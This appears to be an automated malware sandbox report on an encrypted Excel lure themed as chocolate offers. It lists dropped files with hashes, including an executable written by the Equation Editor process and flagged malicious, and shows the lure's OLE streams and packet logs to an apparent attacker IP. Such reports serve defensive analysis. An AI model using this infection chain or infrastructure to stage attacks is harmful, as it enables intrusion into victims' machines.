C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B33F74D7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBC598EC.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8123900257305956
Encrypted:	false
SSDEEP:	3072:g34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:a4UcLe0JOcXuunhqcS
MD5:	4CF29B659FB8B82E00439C894D65A51A
SHA1:	D6EA4F336DB59C905741EF8AF9833B2C95C3E5FE
SHA-256:	AF4CD42DCF26F7A86A38E8D8C94D2AD208BBF3E76F7442A9A249D386ED92C8D9
SHA-512:	0F694B1B50606ED190CBC6B240151AA14ED718AF469810732C26CC26E2E4F2EE410F72352B03D9A6364F719E8ACC0BF8A953A1FB580709CA726152ABD316F037
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$.......-z.x.@..%...............@........N[P@...8...........$....N[P@...8... ....y.x8...@... .........W..z.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...8...l.........W....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .m.6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	246888
Entropy (8bit):	4.648392883751036
Encrypted:	false
SSDEEP:	1536:HrnnnnnnnnnnnnnnnrKDnnnnnnnnnnnnnnnCnnnnnnnnnnnnnnXnnnnnnnnnnnnE:H6LVbA8nT1vnv9dnj6czcW
MD5:	C937FC9ED4325E6AB24D49A3175F3A5C
SHA1:	00439295920E78ECAC31D1DBF7EB67118D76299A
SHA-256:	D54CAFC1CA36D0DDD134F53D033EBBAAA490721D62D4168106A9B6C7CFA200BA
SHA-512:	FF13A5D3BFD503E0F11C9D974A4AC88F965EEC14CBF07723AC9ED425222AAA7C5871A6438CD7491FBD694424EBE4C8675DC076E81564204583336A2940E9A9D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....\S.................0...p......0........@....@.........................................................................t0..(....P...T..........X.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.994472821880961
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
File size:	1267200
MD5:	b7cdda847140697b7bb7866b06d2a225
SHA1:	874d1157c6e65813383c6b4bffd4d48948993c88
SHA256:	1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
SHA512:	8f4b6dd946571e501968cd8317012923d0ca879e3b8bd6cac782a5498887dbb15ca8ce2132a67d5e85a9d05fd700206892ea2789ba805af7be795a3aa005485c
SSDEEP:	24576:nPaV0dsm4NwrrC+F5BNEggUPmQIE9Nc3HCcbRPJHVYgt0W/uMCrYjxaY5SAF:Pw0Jl3OUbIEsXdbRxbh/aBYh
File Content Preview:	........................>.......................................................................................................\|.......~...............z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1253128

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1253128
Entropy:	7.99876914636
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . R . v . . . s x . . . . O . . . . . . . . F . . . > . . . . Z I s . z . . . . . . . Y . ( P . V * . . . . . B . T . 6 . k . ) . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P .
Data Raw:	f8 1e 13 00 00 00 00 00 88 52 18 76 d2 ca a0 73 78 bd a8 80 1c 4f c6 86 b6 da e5 18 a1 ac 46 0a fd ec 3e c9 c5 9e b4 5a 49 73 ae 7a bd 11 aa c2 de 9b d7 59 c9 28 50 15 56 2a 14 da dd 1a a5 42 a0 54 0c 36 d6 6b d7 29 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.60634954238
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . 1 . . . % . . 3 . . i . . 0 . * 2 . P . . ` h 9 . . u . z . . . . . . . . ; . ' \| . . . ] ; . . . . . . . . . . ! . . . ( . . . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:03:05.376049995 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:05.622277021 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:05.622356892 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:05.622628927 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:05.870244980 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:05.870277882 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:05.870312929 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:05.870343924 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:05.870420933 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:05.870445013 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.118174076 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118226051 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118263960 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118300915 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118336916 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118356943 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.118376017 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118396997 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.118398905 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.118415117 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118415117 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.118467093 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.118565083 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364136934 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364173889 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364198923 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364218950 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364243984 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364269018 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364294052 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364320040 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364352942 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364382029 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364382982 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364408970 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364423990 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364437103 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364459038 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364464998 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364491940 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364492893 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364520073 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364527941 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364547014 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.364573002 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.364603043 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.368751049 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611433029 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611480951 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611515045 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611545086 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611568928 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611598969 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611629963 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611655951 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611685991 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611721992 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611721039 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611748934 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611752987 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611752987 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611754894 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611757994 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611787081 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611793041 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611815929 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611821890 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611855984 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611860037 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611871958 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611886024 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611916065 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611917019 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611928940 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611947060 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611958981 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.611975908 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.611991882 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612006903 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612018108 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612037897 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612046957 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612072945 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612097025 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612107038 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612126112 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612138033 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612153053 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612168074 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612180948 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612196922 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612226009 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612242937 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612246037 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612253904 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612268925 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612284899 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612298965 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612318039 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612344980 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612349987 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612370014 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612380981 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.612395048 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.612426043 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.615240097 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858206987 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858228922 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858241081 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858253002 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858339071 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858355999 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858371973 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858382940 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858398914 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858414888 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858413935 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858431101 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858448029 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858450890 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858453989 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858463049 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858474970 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858480930 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858498096 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858500957 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858517885 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858525038 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858536005 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858545065 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858551979 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858566999 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858567953 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858591080 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858608961 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858705997 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858725071 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858741999 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858757019 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858757973 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858777046 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858781099 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858794928 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.858803034 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858823061 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.858844995 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860583067 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860621929 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860658884 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860692024 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860728979 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860730886 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860752106 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860766888 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860776901 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860800982 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860810995 CEST	49167	80	192.168.2.22	180.214.239.39
